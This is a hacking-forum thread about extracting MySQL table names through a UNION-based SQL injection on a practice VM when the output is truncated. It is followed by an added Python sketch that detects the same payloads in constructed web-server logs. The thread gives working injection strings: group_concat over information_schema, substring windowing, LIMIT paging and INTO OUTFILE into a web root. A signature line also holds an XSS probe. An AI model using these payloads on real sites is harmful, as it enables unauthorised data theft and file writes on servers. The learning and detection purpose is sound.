HellBound Hackers | Computer General | Hacking in general

SQL injection in limited space

Thorin, Member
Posts: 12
Location: India
Joined: 09.06.14
Rank: Uber Elite
Posted on 12-01-17 06:18
This might seem like a noob question. I am currently trying SQL injection on a VM. This is what I am trying:
Code
union select group_concat(table_name) from information_schema.tables#

And the injection works. But the page that is returned is an xml file and each tag has a size limitation, so I can see only half of the results.
Code
<title>Bla Forum - Topic:  CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>

Is there a way to print the second half of the results? The table that I need to see contains the word "user". If I'm too ambiguous, I want to do something along the lines of:
1. Arrange the rows of the result and then group_concat it
2. Slice the result (as in string[10:])
3. Select all the rows after tables_priv
_____________________________________________________________
What I already tried:
Code
union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#

Nothing is printed out. But this query works when I try it directly in the VM's mysql (after omitting the 'union' and the '#').
Code
union select group_concat(table_name) from information_schema.tables where table_name like 'user'#

Didn't work on either the web application or directly in the VM's mysql.

PS. I know sqlmap will do the job for me, but I want to try things manually.

&lt;script&gt;alert(1)&lt;/script&gt;
https://www.hellboundhackers.org/user/Thorin.html
RE: SQL injection in limited space

skeet, Member
Posts: 11
Joined: 26.01.16
Rank: HBH Guru
Posted on 12-01-17 15:27
If you know the current working directory or a directory you have access to, try to put the output into a text file with

INTO OUTFILE '/path/where/you/can/read/write/query.txt'
RE: SQL injection in limited space

Thorin, Member
Posts: 12
Location: India
Joined: 09.06.14
Rank: Uber Elite
Posted on 12-01-17 21:40
I don't have access to the file system (from the hacker's perspective, meaning no LFI vulnerabilities)... Anyway, I just solved the question. I used the following payload:

Code
union select substring(group_concat(table_name),341,341) from information_schema.tables#;

RE: SQL injection in limited space

Thorin, Member
Posts: 12
Location: India
Joined: 09.06.14
Rank: Uber Elite
Posted on 12-01-17 21:44
skeet wrote:
If you know the current working directory or a directory you have access to, try to put the output into a text file with

INTO OUTFILE '/path/where/you/can/read/write/query.txt'

Taking into consideration what you're saying: since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another SQL injection, won't that lead me to the same place (size limitations)? Won't work in this situation, but certainly something to try on another machine :)

RE: SQL injection in limited space

skeet, Member
Posts: 11
Joined: 26.01.16
Rank: HBH Guru
Posted on 12-01-17 21:48
Thorin wrote:
skeet wrote:
If you know the current working directory or a directory you have access to, try to put the output into a text file with

INTO OUTFILE '/path/where/you/can/read/write/query.txt'

Taking into consideration what you're saying: since I don't have an LFI or directory traversal vulnerability, I can use SQL injection to read a particular file on the file system. So if I dump the output of the initial injection into a file and then read it using another SQL injection, won't that lead me to the same place (size limitations)? Won't work in this situation, but certainly something to try on another machine :)

I was thinking more along the lines of executing the query with INTO OUTFILE '/var/www/html/results.txt' and then just checking with your browser at http://www.whatever.com/results.txt. Either way, glad you solved your problem :D
RE: SQL injection in limited space

Huitzilopochtli, Member
Posts: 1606
Joined: 19.02.13
Rank: God
Posted on 15-01-17 03:39
If there was no INTO OUTFILE available I'd just have used LIMIT.
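The thread walks through a recognisable probing pattern: a UNION SELECT against information_schema, the result packed with group_concat, then windowed with substring or paged with LIMIT, with INTO OUTFILE as the alternative. Every one of those steps travels in the request and lands in the web server's access log, which is where a defender sees it. The example below is an added detection sketch, not code from the thread, from HellBound Hackers or from any real server: it scans constructed Apache-style access log lines (made up for this example) for the indicators discussed above, URL-decodes repeatedly so encoded payloads surface, and requires more than one strong indicator before raising a finding so that an innocent search for "credit union select committee" is not flagged.

```python
"""Flag the enumeration pattern from this thread in web-server access logs.

Added example with constructed log lines; nothing here is from the original
thread's target or from HellBound Hackers.
"""
import re
from urllib.parse import unquote_plus

# Indicators drawn from the payloads discussed in the thread. All are matched
# case-insensitively on the decoded request path.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "result_packing": re.compile(r"\bgroup_concat\s*\(", re.I),
    "result_windowing": re.compile(r"\b(substring|substr|mid)\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "comment_truncation": re.compile(r"(#|--\s|/\*)"),
}

# Minimal Apache/nginx "common log" shape: ip ident user [ts] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log (not real traffic). Line 2-4 mirror the thread's payloads,
# line 5 is a benign search that contains the words "union" and "select".
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jan/2017:06:18:02 +0000] "GET /forum/topic.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Jan/2017:06:18:40 +0000] "GET /forum/topic.php?id=12+union+select+group_concat(table_name)+from+information_schema.tables%23 HTTP/1.1" 200 6010',
    '203.0.113.7 - - [12/Jan/2017:21:40:11 +0000] "GET /forum/topic.php?id=12+union+select+substring(group_concat(table_name),341,341)+from+information_schema.tables%23 HTTP/1.1" 200 5733',
    '203.0.113.7 - - [12/Jan/2017:21:48:30 +0000] "GET /forum/topic.php?id=12+union+select+1+into+outfile+%27/var/www/html/results.txt%27%23 HTTP/1.1" 500 312',
    '198.51.100.23 - - [12/Jan/2017:22:01:05 +0000] "GET /search.php?q=credit+union+select+committee HTTP/1.1" 200 2210',
]


def decode_request(path, rounds=3):
    """URL-decode the path repeatedly so double-encoded payloads (e.g. %2523) surface."""
    current = path
    for _ in range(rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def classify(path):
    """Return the names of all indicators present in the decoded request path."""
    text = decode_request(path)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_suspicious(hits):
    """Two strong indicators, or any file-write attempt, count as a finding.

    A lone 'union ... select' or a lone comment character is treated as noise,
    which keeps ordinary search terms from being reported.
    """
    strong = [h for h in hits if h != "comment_truncation"]
    return "file_write" in hits or len(strong) >= 2


def scan(lines):
    """Parse each log line and return a finding dict for every suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["path"])
        if is_suspicious(hits):
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "path": m["path"], "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f'{f["ts"]} {f["ip"]} status={f["status"]} indicators={",".join(f["indicators"])}')
```

Against the constructed sample this reports the three injection requests and skips both the plain page view and the benign search. The thresholds are a starting point, not a rule set: tune them against your own traffic, and treat any `file_write` hit as high priority regardless, since INTO OUTFILE succeeding means the database account has FILE privilege and can write inside the web root, which is a configuration problem worth fixing on its own.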